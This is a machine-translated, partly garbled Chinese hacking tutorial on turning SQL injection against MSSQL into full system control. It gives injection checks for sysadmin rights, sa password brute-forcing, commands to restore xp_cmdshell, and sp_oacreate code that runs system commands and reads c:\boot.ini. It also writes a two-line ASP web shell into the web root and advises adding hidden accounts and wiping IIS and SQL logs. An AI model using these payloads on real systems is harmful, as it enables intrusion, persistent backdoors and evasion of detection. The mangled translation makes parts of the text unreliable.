佚名MYHACK58:6220054676To xp_cmdshell March-vulnerability warning-the black bar safety net
To xp_cmdshell March
In MSSQL having sysadmin permission to the user through the xp_cmdshell stored extensions to the system permissions to execute arbitrary system commands, and therefore most of the security attention of the administrator will delete it, even if no deletion is also likely to be obtained due to insufficient permissions and come to naught. Therefore to get the xp_cmdshell execute permissions on it became most of the SQL Injection attack methods the ultimate goal. Me to tell you about in this process involve several key problems and their solutions. Right when is the initiate of.
Get the current user permissions
In MSSQL in the presence of a total of 8 kinds of permissions: sysadmin, dbcreator, diskadmin, processadmin, and serveradmin, setupadmin, securityadmin, bulkadmin it. Each permission has a different role, but also determines our success or failure. In this 8 kinds of permissions, only members of the sysadmin is we really want, and therefore only need to submit
<http://somesite/show.asp?id=4864> and 1=(select IS_SRVROLEMEMBER(‘sysadmin’))
To determine whether the current user has sysadmin permissions. If the return to the normal words that congratulations, today lottery for sure winning! Otherwise, who take the eggs to throw at me.^_^) we have other methods can be used.
Hack the sa account is a weak password
This method should not belong to the SQL Injection category, but in our entire penetration process will often play a decisive role. Well, without further ADO, to open my most commonly used SQLScanPass, the host IP and port 1 4 3 3 write-SQLHost. Txt file, the first test of the air interface of the token, if not successful, then it hung a good dictionary, the probability of success will be greatly increased. Run the interface as shown
Now we can brew a Cup of coffee slowly stop, slowly waiting.
Determine the storage expansion detection
If the current site used by the user is a member of the sysadmin permissions, you can use the worry beggarly method for the storage expansion of detection and recovery, it would be a lot easier. If Yes, get the sa or other account weak password while the rest of the task can be handed over to SQLTools. exe. This app is by the blue glow of the writing, which is powerful hard to imagine. But in addition to perform thedatalibrary commands are required for a certain storage expansion support, so the first thing to determine these storage expansion exists. From the"use directory"in the menu open the performdatalibrary command window, fill in we want to execute the command. For example
select count(*) from master. dbo. sysobjects where xtype=‘X’ and name=‘xp_cmdshell’
Used to determine whether the presence of the xp_cmdshell stored extensions, run the interface as shown
If the return result is 1, then we can use the menu"execute DOS command"option. Otherwise, then we should look down.
Recovery xp_cmdshell, grab broiler
Directly in thedatalibrary command execution window write
Exec master. dbo. addextendedproc ‘xp_cmdshell’, ‘xplog70.dll’; select count(*) from master. dbo. sysobjects where xtype=‘X’ and name=‘xp_cmdshell’
If it returns 1, then it shows the recovery is successful, otherwise we need to give him Upload a xplog70. the dll file.
Open the file upload window to upload the file to the C:\WinNt\System32\lower after the implementation ofthe datalibrary command
Exec master. dbo. addextendedproc ‘xp_cmdshell’, ‘C:\WinNt\System32\xplog70.dll’ the.
OK, the rest is our everyday use of the net use and net localgroup command, asserviceto add a hidden account, clean up the IIS logs and the MSSQL log split. it.
To bypass xp_cmdshell executes a system command
In MSSQL you can through sp_oacreate and sp_oamethod two storage expansion create ActiveXautoscript. Therefore the implementation of the system of the command statement can be written as:
declare @o int
exec sp_oacreate ‘wscript. shell’, @o out
exec sp_oamethod @o, ‘run’, NULL, ‘net start telnet’
His role in theserviceto the server via wscript. shell execute net start telnet, and so onservicetelnet[service](<http://www.3800cc.com/ s).
You will think that the FSO! Yeah, we may also use it for file management, for example:
declare @o int, @f int, @t int, @ret int ,@c varchar(8 0 0 0)
declare @line varchar(8 0 0 0)
exec sp_oacreate ‘scripting. filesystemobject’, @o out
exec sp_oamethod @o, ‘opentextfile’, @f out, ‘c:\boot.ini’, 1
exec @ret = sp_oamethod @f, ‘readline’, @line out
select @c="
while( @ret = 0)
begin
select @c=@c+@line+char(1 3)+char(1 0)
exec @ret = sp_oamethod @f, ‘readline’, @line out
end
可以 读取 c:\boot.ini 文件 中的 内容 并存 储 在 局部 变量 @c 中 the. If you want to read it, you’ll need to create a temporary table written on it.
With this method you can also create the file, and the writedata, for example:
declare @o int, @f int, @t int, @ret int
exec sp_oacreate ‘scripting. filesystemobject’, @o out
exec sp_oamethod @o, ‘createtextfile’, @f out, ‘c:\inetpub\wwwroot\foo.asp’, 1
exec @ret = sp_oamethod @f, ‘writeline’, NULL, ‘<% set o = server. createobject(“wscript. shell”): o. run("cmd.exe /c "&request. querystring(“cmd”)) %>’
In c:\inetpub\wwwroot\foo. asp created a only two lines of code the asp Trojan. This method avoids the use of backup brings a lot of uselessdataand using the sp_makewebtask stored extensions The create temporary table trouble. This is home travel, killing the hard disk of the essential tool.
Total theory
MSSQL provides us with unusually rich store extension libraries, you can complete theoperating systemcan complete the most important functions, such as registry management, File Management, User Management, Permissions management, etc. But if there is not enough security awareness, it will give theserviceto bring deadly threat. Say I own are a bit afraid of afraid of: